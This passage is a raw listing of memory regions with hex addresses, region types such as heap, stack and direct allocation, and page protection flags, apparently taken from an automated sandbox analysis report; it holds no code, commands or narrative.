|
page read and write
|
||
917000
|
heap
|
page read and write
|
||
4750000
|
heap
|
page read and write
|
||
3A4000
|
heap
|
page read and write
|
||
2F3A000
|
heap
|
page read and write
|
||
2685000
|
trusted library allocation
|
page read and write
|
||
3630000
|
direct allocation
|
page execute and read and write
|
||
BD8000
|
heap
|
page read and write
|
||
A07000
|
heap
|
page read and write
|
||
7184000
|
trusted library allocation
|
page read and write
|
||
8B8000
|
heap
|
page read and write
|
||
3E40000
|
direct allocation
|
page execute and read and write
|
||
2DE0000
|
heap
|
page read and write
|
||
7401000
|
heap
|
page read and write
|
||
CCC000
|
heap
|
page read and write
|
||
3BA0000
|
direct allocation
|
page execute and read and write
|
||
3A4000
|
heap
|
page read and write
|
||
7FD10000
|
direct allocation
|
page read and write
|
||
4FCE000
|
stack
|
page read and write
|
||
52FC000
|
stack
|
page read and write
|
||
2E7F000
|
stack
|
page read and write
|
||
3A4000
|
heap
|
page read and write
|
||
7030000
|
unclassified section
|
page read and write
|
||
57C0000
|
heap
|
page read and write
|
||
500000
|
unkown
|
page execute read
|
||
722000
|
heap
|
page read and write
|
||
6E3000
|
heap
|
page read and write
|
||
3680000
|
direct allocation
|
page execute and read and write
|
||
2AB0000
|
heap
|
page read and write
|
||
76E7000
|
direct allocation
|
page read and write
|
||
7160000
|
trusted library allocation
|
page read and write
|
||
3495000
|
direct allocation
|
page read and write
|
||
2D55000
|
heap
|
page read and write
|
||
6C4D000
|
stack
|
page read and write
|
||
7174000
|
trusted library allocation
|
page read and write
|
||
31E0000
|
heap
|
page read and write
|
||
A2A000
|
heap
|
page read and write
|
||
530000
|
heap
|
page read and write
|
||
2C3C000
|
stack
|
page read and write
|
||
1DBA000
|
heap
|
page read and write
|
||
A95000
|
heap
|
page read and write
|
||
2D3B000
|
heap
|
page read and write
|
||
6775000
|
heap
|
page read and write
|
||
3E60000
|
direct allocation
|
page execute and read and write
|
||
8E000
|
stack
|
page read and write
|
||
4210000
|
direct allocation
|
page execute and read and write
|
||
273E000
|
trusted library allocation
|
page read and write
|
||
7FCA0000
|
direct allocation
|
page read and write
|
||
34C4000
|
heap
|
page read and write
|
||
8E2000
|
heap
|
page read and write
|
||
2D7A000
|
heap
|
page read and write
|
||
49A0000
|
heap
|
page read and write
|
||
1FA64B19000
|
heap
|
page read and write
|
||
722F000
|
heap
|
page read and write
|
||
2F60000
|
heap
|
page read and write
|
||
78D0000
|
trusted library allocation
|
page read and write
|
||
229F000
|
direct allocation
|
page read and write
|
||
18C000
|
stack
|
page read and write
|
||
2160000
|
heap
|
page read and write
|
||
2791000
|
heap
|
page read and write
|
||
2DAF000
|
heap
|
page read and write
|
||
2EC3000
|
heap
|
page read and write
|
||
41B0000
|
direct allocation
|
page execute and read and write
|
||
3A4000
|
heap
|
page read and write
|
||
4230000
|
direct allocation
|
page execute and read and write
|
||
36B0000
|
direct allocation
|
page execute and read and write
|
||
928D000
|
stack
|
page read and write
|
||
4C0000
|
heap
|
page read and write
|
||
4501000
|
direct allocation
|
page read and write
|
||
710D000
|
stack
|
page read and write
|
||
104E000
|
unkown
|
page read and write
|
||
8370000
|
direct allocation
|
page execute and read and write
|
||
74E000
|
heap
|
page read and write
|
||
7294000
|
heap
|
page read and write
|
||
2D98000
|
heap
|
page read and write
|
||
8CF000
|
stack
|
page read and write
|
||
5D0000
|
heap
|
page read and write
|
||
2752000
|
trusted library allocation
|
page read and write
|
||
9690000
|
trusted library allocation
|
page read and write
|
||
8130000
|
trusted library allocation
|
page read and write
|
||
2D3A000
|
heap
|
page read and write
|
||
224F000
|
direct allocation
|
page read and write
|
||
C2B000
|
heap
|
page read and write
|
||
4CAD000
|
direct allocation
|
page read and write
|
||
3690000
|
direct allocation
|
page execute and read and write
|
||
17C000
|
stack
|
page read and write
|
||
4000000
|
direct allocation
|
page execute and read and write
|
||
791000
|
heap
|
page read and write
|
||
C0D000
|
heap
|
page read and write
|
||
91E000
|
heap
|
page read and write
|
||
640000
|
heap
|
page read and write
|
||
489F000
|
stack
|
page read and write
|
||
51E0000
|
heap
|
page read and write
|
||
454F000
|
direct allocation
|
page read and write
|
||
34BD000
|
heap
|
page read and write
|
||
2B4D000
|
stack
|
page read and write
|
||
2770000
|
trusted library allocation
|
page read and write
|
||
C28000
|
heap
|
page read and write
|
||
279B000
|
heap
|
page read and write
|
||
8BF000
|
heap
|
page read and write
|
||
1C0000
|
heap
|
page read and write
|
||
7FE20000
|
direct allocation
|
page read and write
|
||
86D000
|
heap
|
page read and write
|
||
1C7000
|
heap
|
page read and write
|
||
4CA0000
|
direct allocation
|
page read and write
|
||
93E000
|
stack
|
page read and write
|
||
34E0000
|
heap
|
page read and write
|
||
277F000
|
heap
|
page read and write
|
||
278C000
|
heap
|
page read and write
|
||
C7D000
|
trusted library allocation
|
page execute and read and write
|
||
78D0000
|
trusted library allocation
|
page read and write
|
||
CBD000
|
heap
|
page read and write
|
||
600000
|
heap
|
page read and write
|
||
3590000
|
direct allocation
|
page execute and read and write
|
||
8FCE000
|
stack
|
page read and write
|
||
2791000
|
heap
|
page read and write
|
||
2C76000
|
heap
|
page read and write
|
||
7481000
|
heap
|
page read and write
|
||
990000
|
heap
|
page read and write
|
||
504E000
|
stack
|
page read and write
|
||
3FC0000
|
direct allocation
|
page execute and read and write
|
||
C88000
|
heap
|
page read and write
|
||
73F0000
|
trusted library allocation
|
page read and write
|
||
38F0000
|
direct allocation
|
page execute and read and write
|
||
358D000
|
heap
|
page read and write
|
||
2EEF000
|
stack
|
page read and write
|
||
3A4000
|
heap
|
page read and write
|
||
1111000
|
unkown
|
page read and write
|
||
34B3000
|
heap
|
page read and write
|
||
8130000
|
trusted library allocation
|
page read and write
|
||
226B000
|
direct allocation
|
page read and write
|
||
7FD50000
|
direct allocation
|
page read and write
|
||
3446000
|
direct allocation
|
page read and write
|
||
2D6F000
|
stack
|
page read and write
|
||
2F39000
|
heap
|
page read and write
|
||
263E000
|
trusted library allocation
|
page read and write
|
||
7427000
|
heap
|
page read and write
|
||
2E0E000
|
stack
|
page read and write
|
||
6788000
|
heap
|
page read and write
|
||
3A4000
|
heap
|
page read and write
|
||
4BA0000
|
trusted library allocation
|
page read and write
|
||
5A9000
|
unkown
|
page read and write
|
||
3960000
|
direct allocation
|
page execute and read and write
|
||
1834000
|
heap
|
page read and write
|
||
2B5C000
|
heap
|
page read and write
|
||
5480000
|
heap
|
page read and write
|
||
4CDD000
|
stack
|
page read and write
|
||
74D7000
|
heap
|
page read and write
|
||
702000
|
heap
|
page read and write
|
||
8C0000
|
trusted library allocation
|
page read and write
|
||
544000
|
heap
|
page read and write
|
||
3A4000
|
heap
|
page read and write
|
||
90A000
|
heap
|
page read and write
|
||
27E0000
|
heap
|
page read and write
|
||
772B000
|
direct allocation
|
page read and write
|
||
724D000
|
stack
|
page read and write
|
||
34C4000
|
heap
|
page read and write
|
||
359B000
|
heap
|
page read and write
|
||
C25000
|
heap
|
page read and write
|
||
2F68000
|
heap
|
page read and write
|
||
5073000
|
direct allocation
|
page read and write
|
||
8130000
|
trusted library allocation
|
page read and write
|
||
61E99000
|
unkown
|
page readonly
|
||
2620000
|
trusted library allocation
|
page read and write
|
||
401000
|
unkown
|
page execute read
|
||
456C000
|
direct allocation
|
page read and write
|
||
4340000
|
direct allocation
|
page execute and read and write
|
||
78D0000
|
trusted library allocation
|
page read and write
|
||
2FB0000
|
heap
|
page read and write
|
||
7A0F000
|
stack
|
page read and write
|
||
401000
|
unkown
|
page execute and read and write
|
||
A0F000
|
stack
|
page read and write
|
||
3A4000
|
heap
|
page read and write
|
||
8130000
|
trusted library allocation
|
page read and write
|
||
32F0000
|
heap
|
page read and write
|
||
903000
|
heap
|
page read and write
|
||
7294000
|
heap
|
page read and write
|
||
180D000
|
heap
|
page read and write
|
||
3497000
|
heap
|
page read and write
|
||
27AC000
|
trusted library allocation
|
page read and write
|
||
CA1000
|
heap
|
page read and write
|
||
C89000
|
heap
|
page read and write
|
||
791000
|
heap
|
page read and write
|
||
341C000
|
direct allocation
|
page read and write
|
||
6F0000
|
heap
|
page read and write
|
||
3A4000
|
heap
|
page read and write
|
||
2F45000
|
heap
|
page read and write
|
||
DC1000
|
unkown
|
page execute read
|
||
8BB000
|
heap
|
page read and write
|
||
4F70000
|
direct allocation
|
page read and write
|
||
2D95000
|
heap
|
page read and write
|
||
5F0000
|
remote allocation
|
page read and write
|
||
35A5000
|
heap
|
page read and write
|
||
4020000
|
direct allocation
|
page execute and read and write
|
||
C25000
|
heap
|
page read and write
|
||
2EAF000
|
heap
|
page read and write
|
||
81CB000
|
trusted library allocation
|
page read and write
|
||
35B0000
|
direct allocation
|
page execute and read and write
|
||
4E8E000
|
stack
|
page read and write
|
||
2FB0000
|
heap
|
page read and write
|
||
181AB990000
|
heap
|
page read and write
|
||
3A4000
|
heap
|
page read and write
|
||
7ED000
|
heap
|
page read and write
|
||
4330000
|
direct allocation
|
page execute and read and write
|
||
893E000
|
stack
|
page read and write
|
||
362000
|
unkown
|
page readonly
|
||
72B0000
|
trusted library allocation
|
page read and write
|
||
104E000
|
unkown
|
page read and write
|
||
500000
|
heap
|
page read and write
|
||
2F8E000
|
stack
|
page read and write
|
||
544000
|
heap
|
page read and write
|
||
3F40000
|
direct allocation
|
page execute and read and write
|
||
725000
|
heap
|
page read and write
|
||
8130000
|
trusted library allocation
|
page read and write
|
||
2EC0000
|
heap
|
page read and write
|
||
652A000
|
direct allocation
|
page read and write
|
||
710000
|
heap
|
page read and write
|
||
81D1000
|
trusted library allocation
|
page read and write
|
||
3A4000
|
heap
|
page read and write
|
||
2D6E000
|
heap
|
page read and write
|
||
35AA000
|
heap
|
page read and write
|
||
6871000
|
heap
|
page read and write
|
||
CC4000
|
heap
|
page read and write
|
||
30C0000
|
heap
|
page read and write
|
||
71C1000
|
heap
|
page read and write
|
||
4240000
|
direct allocation
|
page execute and read and write
|
||
4CFF000
|
stack
|
page read and write
|
||
6FD000
|
heap
|
page read and write
|
||
2CDE000
|
stack
|
page read and write
|
||
3A4000
|
heap
|
page read and write
|
||
7610000
|
direct allocation
|
page read and write
|
||
2D88000
|
heap
|
page read and write
|
||
4290000
|
direct allocation
|
page execute and read and write
|
||
2B4E000
|
stack
|
page read and write
|
||
26E6000
|
direct allocation
|
page read and write
|
||
7182000
|
trusted library allocation
|
page read and write
|
||
863000
|
heap
|
page read and write
|
||
3D30000
|
direct allocation
|
page execute and read and write
|
||
22EA000
|
direct allocation
|
page read and write
|
||
185B000
|
heap
|
page read and write
|
||
279B000
|
heap
|
page read and write
|
||
485E000
|
stack
|
page read and write
|
||
722F000
|
heap
|
page read and write
|
||
294F000
|
stack
|
page read and write
|
||
2D8E000
|
stack
|
page read and write
|
||
1052000
|
unkown
|
page readonly
|
||
3107000
|
heap
|
page read and write
|
||
CD4000
|
heap
|
page read and write
|
||
2D48000
|
heap
|
page read and write
|
||
15FC000
|
stack
|
page read and write
|
||
8B2000
|
heap
|
page read and write
|
||
111A000
|
unkown
|
page write copy
|
||
C2B000
|
heap
|
page read and write
|
||
3F0000
|
heap
|
page read and write
|
||
5BE000
|
heap
|
page read and write
|
||
36F8000
|
direct allocation
|
page read and write
|
||
4D1E000
|
stack
|
page read and write
|
||
27B2000
|
trusted library allocation
|
page read and write
|
||
3A4000
|
heap
|
page read and write
|
||
33BE000
|
stack
|
page read and write
|
||
279B000
|
heap
|
page read and write
|
||
C47000
|
heap
|
page read and write
|
||
2795000
|
heap
|
page read and write
|
||
22A2000
|
direct allocation
|
page read and write
|
||
5040000
|
heap
|
page read and write
|
||
2D33000
|
heap
|
page read and write
|
||
1116000
|
unkown
|
page read and write
|
||
544000
|
heap
|
page read and write
|
||
78D0000
|
trusted library allocation
|
page read and write
|
||
3A4000
|
heap
|
page read and write
|
||
3E70000
|
direct allocation
|
page execute and read and write
|
||
104E000
|
unkown
|
page write copy
|
||
34C4000
|
heap
|
page read and write
|
||
359C000
|
heap
|
page read and write
|
||
2868000
|
trusted library allocation
|
page read and write
|
||
544000
|
heap
|
page read and write
|
||
71C2000
|
heap
|
page read and write
|
||
3F90000
|
direct allocation
|
page execute and read and write
|
||
36A0000
|
direct allocation
|
page execute and read and write
|
||
2253000
|
direct allocation
|
page read and write
|
||
34C4000
|
heap
|
page read and write
|
||
7182000
|
trusted library allocation
|
page read and write
|
||
BDE000
|
heap
|
page read and write
|
||
BD9000
|
heap
|
page read and write
|
||
5A0000
|
heap
|
page read and write
|
||
8130000
|
trusted library allocation
|
page read and write
|
||
7435000
|
heap
|
page read and write
|
||
869000
|
heap
|
page read and write
|
||
35A9000
|
heap
|
page read and write
|
||
34C4000
|
heap
|
page read and write
|
||
6DE000
|
heap
|
page read and write
|
||
BDC000
|
heap
|
page read and write
|
||
544000
|
heap
|
page read and write
|
||
A16000
|
heap
|
page read and write
|
||
677D000
|
heap
|
page read and write
|
||
93DC000
|
stack
|
page read and write
|
||
3EA0000
|
direct allocation
|
page execute and read and write
|
||
878000
|
heap
|
page read and write
|
||
2B5C000
|
heap
|
page read and write
|
||
71B0000
|
heap
|
page read and write
|
||
D7E000
|
stack
|
page read and write
|
||
722F000
|
heap
|
page read and write
|
||
3A4000
|
heap
|
page read and write
|
||
262B000
|
trusted library allocation
|
page read and write
|
||
24F0000
|
trusted library allocation
|
page execute and read and write
|
||
65BD000
|
direct allocation
|
page read and write
|
||
544000
|
heap
|
page read and write
|
||
2C0B000
|
heap
|
page read and write
|
||
CDC000
|
heap
|
page read and write
|
||
277D000
|
heap
|
page read and write
|
||
229B000
|
direct allocation
|
page read and write
|
||
2F25000
|
heap
|
page read and write
|
||
111B000
|
unkown
|
page readonly
|
||
CC4000
|
heap
|
page read and write
|
||
2660000
|
trusted library allocation
|
page read and write
|
||
6F3000
|
heap
|
page read and write
|
||
791000
|
heap
|
page read and write
|
||
4370000
|
direct allocation
|
page execute and read and write
|
||
34C4000
|
heap
|
page read and write
|
||
5EA000
|
unkown
|
page readonly
|
||
8A7E000
|
stack
|
page read and write
|
||
2C50000
|
heap
|
page read and write
|
||
8ED000
|
heap
|
page read and write
|
||
6778000
|
heap
|
page read and write
|
||
CD5000
|
heap
|
page read and write
|
||
508F000
|
stack
|
page read and write
|
||
2F4E000
|
stack
|
page read and write
|
||
3200000
|
remote allocation
|
page read and write
|
||
3A4000
|
heap
|
page read and write
|
||
74A1000
|
heap
|
page read and write
|
||
23B0000
|
direct allocation
|
page read and write
|
||
36EA000
|
direct allocation
|
page read and write
|
||
43B0000
|
direct allocation
|
page execute and read and write
|
||
544000
|
heap
|
page read and write
|
||
4B4F000
|
stack
|
page read and write
|
||
8FC000
|
heap
|
page read and write
|
||
7500000
|
trusted library allocation
|
page read and write
|
||
2680000
|
trusted library allocation
|
page read and write
|
||
885000
|
heap
|
page read and write
|
||
8130000
|
trusted library allocation
|
page read and write
|
||
6FA000
|
heap
|
page read and write
|
||
32C5000
|
direct allocation
|
page read and write
|
||
34D0000
|
direct allocation
|
page execute and read and write
|
||
6DED000
|
stack
|
page read and write
|
||
544000
|
heap
|
page read and write
|
||
2170000
|
direct allocation
|
page execute and read and write
|
||
7160000
|
trusted library allocation
|
page read and write
|
||
39B0000
|
direct allocation
|
page execute and read and write
|
||
544000
|
heap
|
page read and write
|
||
6FD000
|
heap
|
page read and write
|
||
2D60000
|
heap
|
page read and write
|
||
A02E000
|
stack
|
page read and write
|
||
267A000
|
direct allocation
|
page read and write
|
||
111B000
|
unkown
|
page readonly
|
||
5FE000
|
heap
|
page read and write
|
||
5A1000
|
unkown
|
page read and write
|
||
2797000
|
heap
|
page read and write
|
||
C2B000
|
heap
|
page read and write
|
||
5B0000
|
heap
|
page read and write
|
||
81B0000
|
trusted library allocation
|
page read and write
|
||
303D000
|
stack
|
page read and write
|
||
81B0000
|
trusted library allocation
|
page read and write
|
||
745B000
|
heap
|
page read and write
|
||
722E000
|
heap
|
page read and write
|
||
909000
|
heap
|
page read and write
|
||
2D10000
|
heap
|
page read and write
|
||
2F21000
|
heap
|
page read and write
|
||
A05000
|
heap
|
page read and write
|
||
9C8000
|
unkown
|
page execute and read and write
|
||
310B000
|
heap
|
page read and write
|
||
1116000
|
unkown
|
page read and write
|
||
DC1000
|
unkown
|
page execute read
|
||
8C0000
|
heap
|
page read and write
|
||
2EE0000
|
heap
|
page read and write
|
||
54E000
|
stack
|
page read and write
|
||
8B0E000
|
stack
|
page read and write
|
||
78D0000
|
trusted library allocation
|
page read and write
|
||
3F10000
|
direct allocation
|
page execute and read and write
|
||
C1C000
|
heap
|
page read and write
|
||
2E6F000
|
stack
|
page read and write
|
||
1DB8000
|
heap
|
page read and write
|
||
9EE000
|
heap
|
page read and write
|
||
544000
|
heap
|
page read and write
|
||
35B1000
|
heap
|
page read and write
|
||
2261000
|
direct allocation
|
page read and write
|
||
3454000
|
direct allocation
|
page read and write
|
||
3571000
|
heap
|
page read and write
|
||
A48000
|
heap
|
page read and write
|
||
C0D000
|
heap
|
page read and write
|
||
7D0000
|
heap
|
page read and write
|
||
A16E000
|
stack
|
page read and write
|
||
3610000
|
direct allocation
|
page execute and read and write
|
||
3B0000
|
heap
|
page read and write
|
||
C8A000
|
trusted library allocation
|
page execute and read and write
|
||
2D38000
|
heap
|
page read and write
|
||
2F16000
|
heap
|
page read and write
|
||
34C4000
|
heap
|
page read and write
|
||
5651000
|
heap
|
page read and write
|
||
2BAC000
|
stack
|
page read and write
|
||
3CC0000
|
direct allocation
|
page execute and read and write
|
||
722F000
|
heap
|
page read and write
|
||
2A7E000
|
stack
|
page read and write
|
||
40B0000
|
direct allocation
|
page execute and read and write
|
||
2E4E000
|
stack
|
page read and write
|
||
2D0E000
|
stack
|
page read and write
|
||
480F000
|
stack
|
page read and write
|
||
2D7A000
|
heap
|
page read and write
|
||
CBD000
|
heap
|
page read and write
|
||
3B60000
|
direct allocation
|
page execute and read and write
|
||
9D3000
|
unkown
|
page execute and read and write
|
||
3E10000
|
direct allocation
|
page execute and read and write
|
||
C64000
|
trusted library allocation
|
page read and write
|
||
CD5000
|
heap
|
page read and write
|
||
278E000
|
trusted library allocation
|
page read and write
|
||
2DBC000
|
stack
|
page read and write
|
||
709000
|
heap
|
page read and write
|
||
7FE10000
|
direct allocation
|
page read and write
|
||
89A000
|
heap
|
page read and write
|
||
2D55000
|
heap
|
page read and write
|
||
2ACC000
|
stack
|
page read and write
|
||
8130000
|
trusted library allocation
|
page read and write
|
||
8130000
|
trusted library allocation
|
page read and write
|
||
7413000
|
heap
|
page read and write
|
||
744A000
|
heap
|
page read and write
|
||
8C7000
|
heap
|
page read and write
|
||
1FC000
|
heap
|
page read and write
|
||
4010000
|
direct allocation
|
page execute and read and write
|
||
8130000
|
trusted library allocation
|
page read and write
|
||
360000
|
unkown
|
page readonly
|
||
C8A000
|
heap
|
page read and write
|
||
A3AE000
|
stack
|
page read and write
|
||
A06E000
|
stack
|
page read and write
|
||
37C0000
|
direct allocation
|
page execute and read and write
|
||
15D000
|
stack
|
page read and write
|
||
7150000
|
trusted library allocation
|
page read and write
|
||
27D0000
|
heap
|
page read and write
|
||
743E000
|
heap
|
page read and write
|
||
252F000
|
stack
|
page read and write
|
||
4DA0000
|
heap
|
page read and write
|
||
7E0000
|
heap
|
page read and write
|
||
5F3000
|
heap
|
page read and write
|
||
307E000
|
stack
|
page read and write
|
||
7160000
|
trusted library allocation
|
page read and write
|
||
3C00000
|
direct allocation
|
page execute and read and write
|
||
8130000
|
trusted library allocation
|
page read and write
|
||
917000
|
heap
|
page read and write
|
||
912000
|
heap
|
page read and write
|
||
1117000
|
unkown
|
page write copy
|
||
26ED000
|
direct allocation
|
page read and write
|
||
4C43000
|
heap
|
page read and write
|
||
29FE000
|
stack
|
page read and write
|
||
1116000
|
unkown
|
page write copy
|
||
34C4000
|
heap
|
page read and write
|
||
38B0000
|
direct allocation
|
page execute and read and write
|
||
8E5000
|
heap
|
page read and write
|
||
2F1A000
|
heap
|
page read and write
|
||
3A4000
|
heap
|
page read and write
|
||
4260000
|
direct allocation
|
page execute and read and write
|
||
3A4000
|
heap
|
page read and write
|
||
CCC000
|
heap
|
page read and write
|
||
3A4000
|
heap
|
page read and write
|
||
222F000
|
direct allocation
|
page read and write
|
||
22D9000
|
direct allocation
|
page read and write
|
||
1052000
|
unkown
|
page readonly
|
||
3AC0000
|
direct allocation
|
page execute and read and write
|
||
34C4000
|
heap
|
page read and write
|
||
7A6000
|
heap
|
page read and write
|
||
80F000
|
heap
|
page read and write
|
||
71C5000
|
heap
|
page read and write
|
||
904000
|
heap
|
page read and write
|
||
34C4000
|
heap
|
page read and write
|
||
544000
|
heap
|
page read and write
|
||
CDF000
|
heap
|
page read and write
|
||
881000
|
unkown
|
page execute and read and write
|
||
345C000
|
direct allocation
|
page read and write
|
||
3A4000
|
heap
|
page read and write
|
||
34C4000
|
heap
|
page read and write
|
||
5686000
|
heap
|
page read and write
|
||
8FE000
|
heap
|
page read and write
|
||
71C2000
|
heap
|
page read and write
|
||
708000
|
heap
|
page read and write
|
||
544000
|
heap
|
page read and write
|
||
181AB9D0000
|
heap
|
page read and write
|
||
2F34000
|
heap
|
page read and write
|
||
CD5000
|
heap
|
page read and write
|
||
2761000
|
heap
|
page read and write
|
||
38C0000
|
direct allocation
|
page execute and read and write
|
||
CA2000
|
heap
|
page read and write
|
||
2D68000
|
heap
|
page read and write
|
||
81B0000
|
trusted library allocation
|
page read and write
|
||
76EC000
|
direct allocation
|
page read and write
|
||
8FF000
|
heap
|
page read and write
|
||
412000
|
unkown
|
page read and write
|
||
CDD000
|
heap
|
page read and write
|
||
225D000
|
direct allocation
|
page read and write
|
||
7A4E000
|
stack
|
page read and write
|
||
2310000
|
direct allocation
|
page execute and read and write
|
||
2795000
|
heap
|
page read and write
|
||
4280000
|
direct allocation
|
page execute and read and write
|
||
2D7B000
|
heap
|
page read and write
|
||
2F60000
|
heap
|
page read and write
|
||
907000
|
heap
|
page read and write
|
||
3A4000
|
heap
|
page read and write
|
||
CBC000
|
heap
|
page read and write
|
||
8A6000
|
heap
|
page read and write
|
||
7182000
|
trusted library allocation
|
page read and write
|
||
2BE0000
|
heap
|
page read and write
|
||
5690000
|
heap
|
page read and write
|
||
CBC000
|
heap
|
page read and write
|
||
725000
|
heap
|
page read and write
|
||
678D000
|
heap
|
page read and write
|
||
980000
|
heap
|
page read and write
|
||
4120000
|
direct allocation
|
page execute and read and write
|
||
1638000
|
heap
|
page read and write
|
||
71B0000
|
trusted library allocation
|
page read and write
|
||
3A4000
|
heap
|
page read and write
|
||
34F0000
|
direct allocation
|
page execute and read and write
|
||
4E5E000
|
stack
|
page read and write
|
||
43E0000
|
direct allocation
|
page execute and read and write
|
||
C30000
|
heap
|
page read and write
|
||
4F30000
|
trusted library allocation
|
page execute and read and write
|
||
71D6000
|
heap
|
page read and write
|
||
7432000
|
heap
|
page read and write
|
||
484E000
|
stack
|
page read and write
|
||
7174000
|
trusted library allocation
|
page read and write
|
||
26A5000
|
direct allocation
|
page read and write
|
||
CDB000
|
heap
|
page read and write
|
||
540000
|
heap
|
page read and write
|
||
8ABF000
|
stack
|
page read and write
|
||
3623000
|
heap
|
page read and write
|
||
4800000
|
heap
|
page read and write
|
||
7443000
|
heap
|
page read and write
|
||
31CE000
|
stack
|
page read and write
|
||
639000
|
heap
|
page read and write
|
||
111A000
|
unkown
|
page write copy
|
||
224C000
|
direct allocation
|
page read and write
|
||
7FD1C000
|
direct allocation
|
page read and write
|
||
4AE000
|
stack
|
page read and write
|
||
36E000
|
stack
|
page read and write
|
||
880000
|
heap
|
page read and write
|
||
1FC000
|
stack
|
page read and write
|
||
BD5000
|
heap
|
page read and write
|
||
2D3E000
|
stack
|
page read and write
|
||
33F2000
|
direct allocation
|
page read and write
|
||
71C2000
|
heap
|
page read and write
|
||
4470000
|
direct allocation
|
page execute and read and write
|
||
44EE000
|
stack
|
page read and write
|
||
158000
|
stack
|
page read and write
|
||
74A0000
|
heap
|
page read and write
|
||
5B6000
|
unkown
|
page readonly
|
||
8E4000
|
unkown
|
page execute and write copy
|
||
4510000
|
heap
|
page read and write
|
||
8B2000
|
heap
|
page read and write
|
||
CE0000
|
heap
|
page read and write
|
||
3650000
|
direct allocation
|
page execute and read and write
|
||
2795000
|
heap
|
page read and write
|
||
111A000
|
unkown
|
page write copy
|
||
4DDE000
|
stack
|
page read and write
|
||
2A8C000
|
stack
|
page read and write
|
||
5FD000
|
stack
|
page read and write
|
||
8130000
|
trusted library allocation
|
page read and write
|
||
81D0000
|
trusted library allocation
|
page read and write
|
||
3A4000
|
heap
|
page read and write
|
||
544000
|
heap
|
page read and write
|
||
53FC000
|
stack
|
page read and write
|
||
3A4000
|
heap
|
page read and write
|
||
3C20000
|
direct allocation
|
page execute and read and write
|
||
71B9000
|
heap
|
page read and write
|
||
2EAE000
|
stack
|
page read and write
|
||
6A8000
|
heap
|
page read and write
|
||
7E6000
|
heap
|
page read and write
|
||
C2B000
|
heap
|
page read and write
|
||
50D000
|
unkown
|
page write copy
|
||
330F000
|
stack
|
page read and write
|
||
34C4000
|
heap
|
page read and write
|
||
3452000
|
direct allocation
|
page read and write
|
||
32C7000
|
direct allocation
|
page read and write
|
||
7427000
|
heap
|
page read and write
|
||
8130000
|
trusted library allocation
|
page read and write
|
||
1117000
|
unkown
|
page write copy
|
||
33F1000
|
direct allocation
|
page read and write
|
||
331E000
|
direct allocation
|
page read and write
|
||
34DB000
|
heap
|
page read and write
|
||
2B5C000
|
heap
|
page read and write
|
||
3200000
|
remote allocation
|
page read and write
|
||
8130000
|
trusted library allocation
|
page read and write
|
||
CC5000
|
heap
|
page read and write
|
||
3810000
|
direct allocation
|
page execute and read and write
|
||
5689000
|
heap
|
page read and write
|
||
CD1000
|
heap
|
page read and write
|
||
902000
|
heap
|
page read and write
|
||
2F3A000
|
heap
|
page read and write
|
||
7230000
|
heap
|
page read and write
|
||
378000
|
unkown
|
page readonly
|
||
347F000
|
direct allocation
|
page read and write
|
||
8FC000
|
heap
|
page read and write
|
||
61E9F000
|
unkown
|
page readonly
|
||
4BBF000
|
stack
|
page read and write
|
||
19C000
|
stack
|
page read and write
|
||
6A0000
|
heap
|
page read and write
|
||
2313000
|
direct allocation
|
page read and write
|
||
3350000
|
direct allocation
|
page read and write
|
||
111B000
|
unkown
|
page readonly
|
||
32F0000
|
heap
|
page read and write
|
||
71C2000
|
heap
|
page read and write
|
||
4ECF000
|
stack
|
page read and write
|
||
5686000
|
heap
|
page read and write
|
||
3F30000
|
direct allocation
|
page execute and read and write
|
||
3A70000
|
direct allocation
|
page execute and read and write
|
||
7FD49000
|
direct allocation
|
page read and write
|
||
8D6000
|
heap
|
page read and write
|
||
21E6000
|
direct allocation
|
page read and write
|
||
576000
|
heap
|
page read and write
|
||
1730000
|
heap
|
page read and write
|
||
2F3D000
|
heap
|
page read and write
|
||
360000
|
heap
|
page read and write
|
||
544000
|
heap
|
page read and write
|
||
27C0000
|
heap
|
page read and write
|
||
3910000
|
direct allocation
|
page execute and read and write
|
||
1C7000
|
heap
|
page read and write
|
||
C73000
|
trusted library allocation
|
page read and write
|
||
2F4F000
|
stack
|
page read and write
|
||
8130000
|
trusted library allocation
|
page read and write
|
||
51E000
|
stack
|
page read and write
|
||
34C4000
|
heap
|
page read and write
|
||
71BA000
|
heap
|
page read and write
|
||
8D0000
|
heap
|
page read and write
|
||
228C000
|
direct allocation
|
page read and write
|
||
2560000
|
heap
|
page read and write
|
||
3E20000
|
direct allocation
|
page execute and read and write
|
||
3411000
|
direct allocation
|
page read and write
|
||
4F96000
|
direct allocation
|
page read and write
|
||
570000
|
heap
|
page read and write
|
||
1C7000
|
heap
|
page read and write
|
||
35A1000
|
heap
|
page read and write
|
||
8D4000
|
heap
|
page read and write
|
||
544000
|
heap
|
page read and write
|
||
71C4000
|
heap
|
page read and write
|
||
2F1B000
|
heap
|
page read and write
|
||
7FF000
|
heap
|
page read and write
|
||
8130000
|
trusted library allocation
|
page read and write
|
||
70E000
|
stack
|
page read and write
|
||
29B0000
|
heap
|
page read and write
|
||
6F2000
|
heap
|
page read and write
|
||
646000
|
heap
|
page read and write
|
||
424F000
|
stack
|
page read and write
|
||
491F000
|
stack
|
page read and write
|
||
DC1000
|
unkown
|
page execute read
|
||
30D7000
|
heap
|
page read and write
|
||
2755000
|
trusted library allocation
|
page read and write
|
||
3FD0000
|
direct allocation
|
page execute and read and write
|
||
2F45000
|
heap
|
page read and write
|
||
71D6000
|
heap
|
page read and write
|
||
BF1000
|
heap
|
page read and write
|
||
32F0000
|
direct allocation
|
page execute and read and write
|
||
7CF000
|
heap
|
page read and write
|
||
8790000
|
trusted library allocation
|
page read and write
|
||
4B4F000
|
stack
|
page read and write
|
||
1645000
|
heap
|
page read and write
|
||
74E000
|
heap
|
page read and write
|
||
71D6000
|
heap
|
page read and write
|
||
3A4000
|
heap
|
page read and write
|
||
71C5000
|
heap
|
page read and write
|
||
7FDBE000
|
direct allocation
|
page read and write
|
||
37B0000
|
direct allocation
|
page execute and read and write
|
||
34C4000
|
heap
|
page read and write
|
||
8130000
|
trusted library allocation
|
page read and write
|
||
275A000
|
trusted library allocation
|
page read and write
|
||
4F4F000
|
stack
|
page read and write
|
||
35AB000
|
heap
|
page read and write
|
||
3B30000
|
direct allocation
|
page execute and read and write
|
||
2F22000
|
heap
|
page read and write
|
||
3390000
|
heap
|
page read and write
|
||
6870000
|
heap
|
page read and write
|
||
2C40000
|
heap
|
page read and write
|
||
7481000
|
heap
|
page read and write
|
||
7FD70000
|
direct allocation
|
page read and write
|
||
CDA000
|
heap
|
page read and write
|
||
22CB000
|
direct allocation
|
page read and write
|
||
2D95000
|
heap
|
page read and write
|
||
3A4000
|
heap
|
